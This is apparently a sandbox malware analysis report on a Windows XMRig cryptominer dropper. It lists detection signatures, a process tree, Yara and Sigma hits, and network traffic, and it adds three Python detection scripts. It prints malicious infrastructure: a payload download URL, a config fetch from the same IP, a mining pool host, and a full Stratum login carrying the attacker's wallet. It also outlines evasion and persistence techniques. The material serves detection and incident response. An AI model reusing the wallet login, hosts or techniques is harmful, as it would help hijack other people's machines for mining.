Windows Analysis Report P7Oa6i5muL

Overview

General Information

Sample Name: P7Oa6i5muL (renamed file extension from none to exe)
Analysis ID: 448402
MD5: 9dbcf183762872d8917b8a19535a0c65
SHA1: 94d27127f8ffbebec6ad803599ed3c0477a15e3c
SHA256: 759d3e20098353e73c0c417ecf755a3ab24cdf7ead10df8c5a4aab549d7423f2
Tags: 32exe

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates a thread in another existing process (thread injection)
DNS related to crypto mining pools
Detected Stratum mining protocol
Injects a PE file into a foreign process
Modifies the context of a thread in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • P7Oa6i5muL.exe (PID: 4116 cmdline: 'C:\Users\user\Desktop\P7Oa6i5muL.exe' MD5: 9DBCF183762872D8917B8A19535A0C65)
    • P7Oa6i5muL.exe (PID: 2492 cmdline: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe MD5: 9DBCF183762872D8917B8A19535A0C65)
      • jwMZjhPggeDR.exe (PID: 2520 cmdline: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe MD5: 77276DDC82248473D033E2494C438A97)
      • notepad.exe (PID: 2168 cmdline: 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg' MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
      • cmd.exe (PID: 6140 cmdline: cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 3888 cmdline: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
  • svchost.exe (PID: 2396 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3376 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5636 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2292 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5400 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3112 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3260 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3544 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1724 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5884 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 1832 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 3016 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
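The process tree above can be read by eye, but the judgements it invites (a copy of the sample re-launched from Temp, an executable under a random-looking Program Files directory, notepad.exe started with a switch it does not have, cmd /C handing a ProgramData .vbs to WScript) can be encoded and run over any process-creation log. The Python below is an added example and is not part of the Joe Sandbox report. It rebuilds the tree's events from the PIDs, images, command lines and MD5s listed above; parent links follow the nesting, the service host gets no parent because the tree shows none, and the wscript.exe and cmd.exe image paths are the SysWOW64 paths given in the Sigma data further down. The list of Notepad's documented switches and the 35% case-flip threshold in the random-name heuristic are assumptions.

```python
"""Added example (not from the report): rule-based triage of a process tree."""
import re
from pathlib import PureWindowsPath

# Process-creation events rebuilt from the report's process tree. ppid=None
# means the tree shows no parent (sandbox launcher or service host).
EVENTS = [
    dict(pid=4116, ppid=None, image=r"C:\Users\user\Desktop\P7Oa6i5muL.exe",
         cmdline=r"'C:\Users\user\Desktop\P7Oa6i5muL.exe'",
         md5="9DBCF183762872D8917B8A19535A0C65"),
    dict(pid=2492, ppid=4116, image=r"C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe",
         cmdline=r"C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe",
         md5="9DBCF183762872D8917B8A19535A0C65"),
    dict(pid=2520, ppid=2492,
         image=r"C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe",
         cmdline=r"C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe",
         md5="77276DDC82248473D033E2494C438A97"),
    dict(pid=2168, ppid=2492, image=r"C:\Windows\notepad.exe",
         cmdline=r"'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'",
         md5="BB9A06B8F2DD9D24C77F389D7B2B58D2"),
    dict(pid=6140, ppid=2492, image=r"C:\Windows\SysWOW64\cmd.exe",
         cmdline=r"cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'",
         md5="F3BDBE3BB6F734E357235F4D5898582D"),
    dict(pid=1092, ppid=6140, image=r"C:\Windows\system32\conhost.exe",
         cmdline=r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
         md5="EA777DEEA782E8B4D7C7C33BBF8A4496"),
    dict(pid=3888, ppid=6140, image=r"C:\Windows\SysWOW64\wscript.exe",
         cmdline=r"WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'",
         md5="7075DD7B9BE8807FCA93ACD86F724884"),
    dict(pid=2396, ppid=None, image=r"C:\Windows\System32\svchost.exe",
         cmdline=r"C:\Windows\System32\svchost.exe -k netsvcs -p",
         md5="32569E403279B3FD2EDB7EBD036273FA"),
]

STAGING_DIRS = ("\\programdata\\", "\\appdata\\local\\temp\\", "\\users\\public\\", "\\windows\\temp\\")
SCRIPT_HOSTS = ("wscript", "cscript")
NOTEPAD_SWITCHES = {"/a", "/w", "/p", "/pt"}   # assumption: Notepad's documented switches


def looks_random(name):
    """Heuristic (assumed threshold): long alphanumeric names whose letters flip
    case at >= 35% of adjacent positions, as dropper-generated names tend to."""
    if len(name) < 12 or not name.isalnum():
        return False
    flips = sum(1 for a, b in zip(name, name[1:])
                if a.isalpha() and b.isalpha() and a.isupper() != b.isupper())
    return flips / (len(name) - 1) >= 0.35


def triage(events):
    """Return {pid: [reason, ...]} for every event at least one rule fires on."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        reasons = []
        path = PureWindowsPath(e["image"])
        image_l, cmd_l = e["image"].lower(), e["cmdline"].lower()
        parent = by_pid.get(e["ppid"])

        # 1. Executable started from a user-writable staging directory.
        if any(d in image_l for d in STAGING_DIRS):
            reasons.append("image in user-writable staging directory")

        # 2. Random-looking directory or file names (dropper-generated).
        odd = [p for p in list(path.parts[1:-1]) + [path.stem] if looks_random(p)]
        if odd:
            reasons.append("random-looking path component(s): " + ", ".join(odd))

        # 3. Same MD5 as the parent but a different path: the sample re-launched
        #    a copy of itself from Temp.
        if parent and parent["md5"].lower() == e["md5"].lower() and parent["image"].lower() != image_l:
            reasons.append("same MD5 as parent at a different path (relocated copy)")

        # 4. A script host (directly, or via cmd /C) running a script from staging.
        if any(h in cmd_l for h in SCRIPT_HOSTS) and any(d in cmd_l for d in STAGING_DIRS):
            reasons.append("script host executing a script from a staging directory")

        # 5. notepad.exe given a switch it does not document ('-c <cfg>' here);
        #    with the Yara hit in its memory this is the hollowed-process pattern.
        if path.name.lower() == "notepad.exe":
            switches = {"/" + a[1:].lower() for a in e["cmdline"].split()[1:] if a[:1] in "-/"}
            unexpected = sorted(switches - NOTEPAD_SWITCHES)
            if unexpected:
                reasons.append("notepad.exe with unexpected switch(es): " + " ".join(unexpected))

        if reasons:
            findings[e["pid"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in sorted(triage(EVENTS).items()):
        print(pid, "->", "; ".join(reasons))
```

Rule 5 is the one most worth keeping in a real ruleset: the sandbox's Yara match inside notepad.exe's memory only makes sense if the process was started suspended and overwritten, and an unexplained command-line switch on a system binary is the cheapest host-side signal of that.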

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) | 0x14: $file: URL= ; 0x0: $url_explicit: [InternetShortcut]

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000000.221202486.00000000035D0000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000007.00000003.456029595.0000018420035000.00000004.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000006.00000000.224986002.00000000035D0000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000005.00000002.470611042.0000000003320000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000006.00000000.229478984.00000000035D0000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
(4 further memory-dump matches are not included in this extract)

Unpacked PEs

Source | Rule | Description | Author | Strings
6.0.jwMZjhPggeDR.exe.35d0000.3.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
6.0.jwMZjhPggeDR.exe.35d0000.5.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
6.0.jwMZjhPggeDR.exe.35d0000.1.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
6.2.jwMZjhPggeDR.exe.35d0000.1.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
5.2.P7Oa6i5muL.exe.3320000.3.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
(2 further unpacked-PE matches are not included in this extract)

Sigma Overview

System Summary:

Sigma detected: WScript or CScript Dropper
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community; Data: Command: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', CommandLine: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', CommandLine|base64offset|contains: Y'+, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6140, ProcessCommandLine: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', ProcessId: 3888

Data Obfuscation:

Sigma detected: Drops script at startup location
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 3888, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
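Both the Yara hit on the dropped file (the `[InternetShortcut]` and `URL=` strings at offsets 0x0 and 0x14) and the Sigma hit above (wscript.exe writing into the Startup folder) establish that the shortcut exists; neither shows what it points at, because the report does not print the file's contents. The Python below is an added example, not part of the report, that parses .url files as the INI files they are and rates them: a shortcut in the Startup folder whose URL= target is a local script or executable, especially one under ProgramData, Temp or AppData, is the persistence pattern both rules are after, while a Startup shortcut to an https:// page is merely odd. All four sample files are constructed; the first reuses the r.vbs path from the process tree as a plausible target, which is an assumption and not something the report states.

```python
"""Added example (not from the report): rate .url (InternetShortcut) files for persistence abuse."""
import configparser
import re
from pathlib import PureWindowsPath
from urllib.parse import urlparse, unquote

# Constructed sample files: (path on disk, file contents). The report does not
# show the real contents of viTRMUuKeV.url; the first entry assumes it points
# at the r.vbs that the process tree shows wscript.exe running.
SAMPLES = [
    (r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url",
     "[InternetShortcut]\nURL=file:///C:/ProgramData/LKBNMTFJgl/r.vbs\n"),
    (r"C:\Users\user\Desktop\Docs.url",
     "[InternetShortcut]\nURL=https://docs.example.com/\nIconIndex=0\n"),
    (r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\News.url",
     "[InternetShortcut]\nURL=https://news.example.com/\n"),
    (r"C:\Users\user\Desktop\Report.url",
     "[InternetShortcut]\nURL=C:\\Users\\Public\\report.hta\n"),
]

SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1",
               ".bat", ".cmd", ".exe", ".scr", ".dll", ".lnk", ".com", ".pif"}
STAGING_DIRS = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
DRIVE_PATH = re.compile(r"^[a-z]:[\\/]", re.IGNORECASE)


def local_target(url):
    """Windows path if the URL names a local or UNC file, else None."""
    if DRIVE_PATH.match(url):          # bare path such as C:\Users\Public\x.hta
        return url
    p = urlparse(url)
    if p.scheme.lower() != "file":
        return None
    path = unquote(p.path).replace("/", "\\")
    if p.netloc:                       # file://server/share/x -> \\server\share\x
        return "\\\\" + p.netloc + path
    return path.lstrip("\\")           # file:///C:/x -> C:\x


def assess_url_shortcut(path, content):
    """Parse one .url file and return its target, context and a severity."""
    cp = configparser.RawConfigParser()
    cp.read_string(content.replace("\r\n", "\n"))
    url = cp.get("InternetShortcut", "URL", fallback="").strip()
    in_startup = STARTUP_DIR in path.lower()
    target = local_target(url)
    reasons = []
    if target is not None:
        ext = PureWindowsPath(target).suffix.lower()
        if ext in SCRIPT_EXTS:
            reasons.append(f"targets a local script/executable ({ext})")
        if any(d in target.lower() for d in STAGING_DIRS):
            reasons.append("target lives in a user-writable staging directory")
    else:
        scheme = urlparse(url).scheme.lower()
        if scheme not in ("http", "https"):
            reasons.append(f"non-web URI handler: {scheme or '(none)'}")
    if in_startup and reasons:
        severity = "high"      # runs at every logon and does not open a web page
    elif reasons:
        severity = "medium"
    else:
        severity = "low"
    return {"path": path, "target": target or url, "in_startup": in_startup,
            "reasons": reasons, "severity": severity}


if __name__ == "__main__":
    for p, c in SAMPLES:
        r = assess_url_shortcut(p, c)
        print(r["severity"].upper(), PureWindowsPath(p).name, "->", r["target"], r["reasons"])
```

The `file:` and bare-drive cases matter because Windows resolves both through the shell, so a .url in Startup is as good as a .lnk for running a local script; the Yara rule's name ("OtherURIhandlers") is about exactly this, and the non-web-scheme branch catches the remaining handlers (e.g. `ms-msdt:` or `javascript:`) without a hard-coded list.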

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://45.144.225.135/notepad.exe; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://45.144.225.135/notepad.exe; Virustotal: Detection: 13%
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\LKBNMTFJgl\csrss; ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe; ReversingLabs: Detection: 20%
Multi AV Scanner detection for submitted file
Source: P7Oa6i5muL.exe; Virustotal: Detection: 20%
Source: P7Oa6i5muL.exe; ReversingLabs: Detection: 20%
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.jwMZjhPggeDR.exe.35d0000.1.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 6.0.jwMZjhPggeDR.exe.35d0000.3.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 5.2.P7Oa6i5muL.exe.3320000.3.unpack; Avira: Label: TR/Dropper.Gen
Source: 6.0.jwMZjhPggeDR.exe.35d0000.1.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 5.2.P7Oa6i5muL.exe.400000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 6.0.jwMZjhPggeDR.exe.35d0000.5.unpack; Avira: Label: TR/ATRAPS.Gen
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe; Code function: 5_2_00408B20 CreateFileW,CryptAcquireContextW,CloseHandle,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,FindCloseChangeNotification,5_2_00408B20
Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe; Code function: 6_2_035D8B20 CreateFileW,CryptAcquireContextW,CloseHandle,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,6_2_035D8B20

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 6.0.jwMZjhPggeDR.exe.35d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.0.jwMZjhPggeDR.exe.35d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.0.jwMZjhPggeDR.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.jwMZjhPggeDR.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.P7Oa6i5muL.exe.3320000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.P7Oa6i5muL.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.P7Oa6i5muL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000000.221202486.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000003.456029595.0000018420035000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.224986002.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.470611042.0000000003320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.229478984.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: notepad.exe PID: 2168, type: MEMORY
Source: Yara match; File source: Process Memory Space: P7Oa6i5muL.exe PID: 2492, type: MEMORY
DNS related to crypto mining pools
Source: unknown; DNS query: name: xmr-us-east1.nanopool.org
Detected Stratum mining protocol
Source: global traffic; TCP traffic: 192.168.2.3:49721 -> 144.217.14.139:14444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"48qbpzutwm8gg6t6eg6h7jgxad6enjh8o3roylgbeqym7txydu9tfmfuugaheqa7bfdhtfb9d665cgydj6f5kvdjlegjmdw.worker/picktutos","pass":"x","agent":"xmrig/5.11.1 (windows nt 10.0; win64; x64) libuv/1.34.0 gcc/8.2.0","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","argon2/chukwa","argon2/wrkz","astrobwt"]}}.
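The login above is the whole sample in one packet: newline-delimited JSON-RPC over a raw TCP socket to port 14444, a 95-character Monero address plus worker name as the login, and an agent field naming the miner build. The Python below is an added example, not part of the report, that picks such Stratum logins out of captured TCP payloads and extracts the fields a responder wants (pool endpoint, wallet, worker, miner agent, advertised algorithms). The sample flows are constructed: the first carries the captured login from above with the algorithm list shortened, the other two are a benign JSON-RPC call and plain HTTP for contrast. The report appears to print the payload lowercased (XMRig sends "Windows NT", not "windows nt"), so the address check is case-insensitive; real Monero addresses are case-sensitive base58.

```python
"""Added example (not from the report): find Stratum/XMRig logins in captured TCP payloads."""
import json
import re
from dataclasses import dataclass, field

# Constructed sample flows: (src, dst, payload). The first payload is the login
# the report captured (algorithm list shortened); the other two are benign.
SAMPLE_FLOWS = [
    ("192.168.2.3:49721", "144.217.14.139:14444",
     '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"48qbpzutwm8gg6t6eg6h7jgxad6enjh8o3roylgbeqym7txydu9tfmfuugaheqa7bfdhtfb9d665cgydj6f5kvdjlegjmdw.worker/picktutos","pass":"x","agent":"xmrig/5.11.1 (windows nt 10.0; win64; x64) libuv/1.34.0 gcc/8.2.0","algo":["cn/0","cn/r","rx/0","astrobwt"]}}\n'),
    ("192.168.2.3:49730", "10.0.0.5:8545",
     '{"id":1,"jsonrpc":"2.0","method":"eth_blockNumber","params":[]}\n'),
    ("192.168.2.3:49731", "10.0.0.6:8080",
     "GET /config.txt HTTP/1.1\r\nHost: 10.0.0.6\r\n\r\n"),
]

STRATUM_METHODS = {"login", "mining.subscribe", "mining.authorize", "mining.submit", "submit", "keepalived"}
MINER_AGENTS = ("xmrig", "xmr-stak", "cpuminer", "ccminer", "nbminer", "lolminer", "t-rex")
# Monero address: 95 base58 characters starting with 4 (primary) or 8 (subaddress).
# Base58 has no 0/O/I/l; the class is loose and case-insensitive because the
# captured payload is lowercased.
XMR_ADDRESS = re.compile(r"^[48][1-9a-z]{94}$", re.IGNORECASE)


@dataclass
class StratumLogin:
    src: str
    dst: str
    method: str
    wallet: str = ""
    worker: str = ""
    agent: str = ""
    algos: list = field(default_factory=list)

    @property
    def is_miner(self):
        """True when either the login looks like a wallet or the agent names a miner."""
        return bool(XMR_ADDRESS.match(self.wallet)) or self.agent.lower().startswith(MINER_AGENTS)


def parse_message(src, dst, line):
    """Return a StratumLogin for one Stratum JSON-RPC line, else None."""
    line = line.strip()
    if not line.startswith("{"):
        return None
    try:
        msg = json.loads(line)
    except ValueError:
        return None
    method = msg.get("method")
    if method not in STRATUM_METHODS:
        return None
    hit = StratumLogin(src, dst, method)
    params = msg.get("params")
    if method == "login" and isinstance(params, dict):
        # XMRig sends "<wallet>.<worker>", optionally with a pool-specific "/suffix".
        login = str(params.get("login", ""))
        hit.wallet, _, rest = login.partition(".")
        hit.worker = rest.split("/", 1)[0]
        hit.agent = str(params.get("agent", ""))
        hit.algos = [str(a) for a in params.get("algo", [])]
    return hit


def scan_flows(flows):
    """Return one StratumLogin per Stratum message found in any flow payload."""
    hits = []
    for src, dst, payload in flows:
        for line in payload.splitlines():      # Stratum is newline-delimited JSON
            hit = parse_message(src, dst, line)
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan_flows(SAMPLE_FLOWS):
        print(f"{h.src} -> {h.dst} {h.method} wallet={h.wallet[:12]}... "
              f"worker={h.worker} agent={h.agent!r} miner={h.is_miner}")
```

Matching on the method name alone is not enough (`login` is a generic JSON-RPC method), which is why `is_miner` requires the wallet shape or a miner agent; the port, by contrast, is not used at all, since pools listen on anything from 3333 to 14444 and the sample here would be missed by a port-based rule.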

Compliance:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe; Unpacked PE file: 5.2.P7Oa6i5muL.exe.3320000.3.unpack
Uses 32bit PE files
Source: P7Oa6i5muL.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: P7Oa6i5muL.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic; TCP traffic: 192.168.2.3:49721 -> 144.217.14.139:14444
IP address seen in connection with other malware
Source: Joe Sandbox View; IP Address: 45.144.225.135 45.144.225.135
Internet Provider seen in connection with other malware
Source: Joe Sandbox View; ASN Name: OVHFR OVHFR
Source: unknown; TCP traffic detected without corresponding DNS query: 45.144.225.135 (12 identical entries in the report)
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe; Code function: 5_2_00404B00 GetTickCount,GetTickCount,InternetCrackUrlA,InternetOpenA,InternetConnectA,InternetCloseHandle,GetTickCount,HttpOpenRequestA,GetTickCount,GetTickCount,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,5_2_00404B00
Source: global traffic; HTTP traffic detected: GET /config.txt HTTP/1.1 | Accept: text/*, application/exe, application/zlib, application/gzip, application/applefile | User-Agent: WinInetGet/0.1 | Host: 45.144.225.135 | Connection: Keep-Alive | Cache-Control: no-cache
Source: svchost.exe, 00000019.00000002.347865649.00000247260EB000.00000004.00000001.sdmp; String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.facebook.com (Facebook)
Source: svchost.exe, 00000019.00000002.347865649.00000247260EB000.00000004.00000001.sdmp; String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.twitter.com (Twitter)
